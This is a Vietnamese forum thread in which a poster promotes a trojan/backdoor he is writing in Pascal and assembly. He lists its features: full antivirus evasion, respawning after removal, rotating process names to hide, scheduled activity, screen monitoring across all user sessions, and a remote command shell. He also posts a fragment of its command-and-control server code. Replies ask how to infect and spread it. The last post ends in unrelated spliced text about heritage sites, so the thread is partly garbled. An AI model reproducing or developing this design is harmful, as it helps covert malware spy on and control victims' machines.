-
19-11-2013, 07:50 PM #1Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Lập trình virus trojan backdoor nâng cao.
Mạo muội lập topic này để anh em giao lưu chia sẻ kinh nghiệm về lập trình trojan [IMG]images/smilies/lick.gif[/IMG]
Mình xin phép giới thiệu về tính năng của con trojan mình đang xây dựng [IMG]images/smilies/2.gif[/IMG]
Ưu điểm:
-> dễ dàng cập nhật version.
-> chạy thông minh (khi nào cần sử dụng virus tự chạy ... không cần thì thôi không chạy ... khó tìm[IMG]images/smilies/wink.png[/IMG])
-> nếu virus bị phát hiện ... victim sẽ tự nhiên mọc lại con mới ở ngay chỗ mới với 1 tên gọi mới [IMG]images/smilies/lick.gif[/IMG]
-> anti virus 100% tất cả không phát hiện ra.
-> không sử dụng lib hay dll gì riêng của win vì vốn tự có nên dung lượng hơi cao. (đã test chạy ok từ win xp đến 2012 r2).
-> có thể chỉnh chế độ safe timer run , giả sử làm việc lúc 12h đêm đến 3h sáng thì trong khoảng thời gian đã định virus sẽ chạy và request về server , nếu ko đúng giờ thì nằm yên [IMG]images/smilies/biggrin.png[/IMG]
-> Trong thời gian hoạt động, virus sẽ tự động tắt nghỉ 15 phút / lần để thay đổi process name liên tục để tránh bị truy quét. thường sẽ count process nào chạy *.exe nhiều nhất thì sẽ chạy theo tên đó, lập 1 danh sách cụ thể xếp theo thứ tự vào hoán đổi vị trí theo các chu kỳ. (rõ khổ cho các bác chạy anti vir = tay ^_^!)
-> Tính năng ưa thích nhất: Virus chạy multi sessions. Giả sử không có user nào logon thì virus khi hoạt động sẽ chạy quyền cao nhất của windows, giả sử có 3 user admin, administrator, guest đang làm việc trên 1 máy, virus sẽ tự chạy cả 3 sessions thêm cái session thứ 4 cao nhất của windows -> tổng là 4. Vì vậy có thể nhìn màn hình trên mỗi user đang làm việc phân chia ra cụ thể.
Khuyết điểm:
-> size khá lớn thường là 3,5 mb.
-> do code ẩu nên còn bug vài chỗ, khổ là phải đang ngồi fix và xem lại từng dòng [IMG]images/smilies/lick.gif[/IMG]
-> tính năng chưa hoàn thiện mấy, nhưng về nhìn chung thì mình chỉ cần remote CMD thôi [IMG]images/smilies/17.gif[/IMG]
Ngôn ngữ lập trình:
-> Pascal
-> ASM
Vài hình ảnh interface cho các bạn tham khảo:
<font color="Red">Bài 1: Kết nối:
Server:
Mã:procedure FormCreate(Sender: TObject); procedure Timer1Timer(Sender: TObject); procedure ServerSocket1ClientDisconnect(Sender: TObject; Socket: TCustomWinSocket); procedure ServerSocket1ClientError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure Starthostserver1Click(Sender: TObject); procedure Stophostserver1Click(Sender: TObject); procedure ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinSocket); procedure TForm1.FormCreate(Sender: TObject); var ResStream: TResourceStream; begin DeleteFile('DiaChi_IP.database'); if not FileExists('DiaChi_IP.database') then begin ResStream := TResourceStream.Create(hInstance, 'DiaChi_IP', RT_RCDATA); try ResStream.Position := 0; ResStream.SaveToFile('DiaChi_IP.database'); finally ResStream.Free; end; end; StatusBar1.Panels[0].Text := StatusBar1.Panels[0].Text + GetBuildInfoAsString; KetNoi_GS := 0; KetNoi_KT := 0; Spxp1.Click; end; procedure TForm1.FormShow(Sender: TObject); var i : Integer; begin for i := 0 to ParamCount do begin if ParamStr(i) = '/@/Khoi_dong_tat_ca/@/' then begin Starthostserver1.Click; Khingmychktni1.Click; end; end; end; procedure TForm1.ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket); begin KetNoi_GS := KetNoi_GS + 1; ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS)); end;
View more random threads:
- Viết file bat để xóa virus trong USB drivers như thế nào?
- Mã nguồn chương trình quyét virus viết trên VC++ 2008
- Code virut viết bằng C, tác dụng của nó như thế nào?
- Cách viết một con virus đơn giản?
- Nguyên nhân tôi viết virus, đam mê và làm chủ
- Debug xem task manager tắt file bằng hàm api nào
- Khẩn cấp diệt con bot trên máy các bạn !
- Hook winsock, bắt Link khi duyệt web như thế nào?
- Lập trình Virus | Cách tạo Key khởi động cho Virus
- Virus Autorun USB dù Windows đã Disable Autorun
-
23-05-2014, 03:51 PM #2Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Bác cho em hỏi 1 chút là pascal thì giao tiếp với api window kiểu gì vậy, hồi lớp 10 học mỗi turbo pascal, toàn dos.
Thank bác
-
16-10-2014, 05:42 PM #3Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Thế còn lây nhiễm và phát tán thì sao ạ? [IMG]images/smilies/clap_grin.gif[/IMG]
-
17-10-2014, 08:25 AM #4Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Rãnh giả mang luôn, sao mình thấy đối tượng theo giỏi toàn window server không vậy ? Íts khi nao thay user sài windows server lắm ... chắc cái naa`y server của bạn phải kô ?
-
30-05-2016, 11:06 AM #5Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
con này gờ còn xài được không anh?
-
01-06-2016, 01:11 PM #6Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Pascal
Mã:procedure TForm1.ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket);begin KetNoi_GS := KetNoi_GS + 1; ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS));end;
Vừa qua, Chính phủ đã ban hành Quyết định số 2383/QĐ-TTg ngày 09/12/2013 về việc xếp hạng di tích quốc gia đặc biệt. Theo đó, khu di tích Đường Trường Sơn - Đường Hồ Chí Minh là 1 trong 14 kỷ vật...
Các relic, danh thắng được xếp...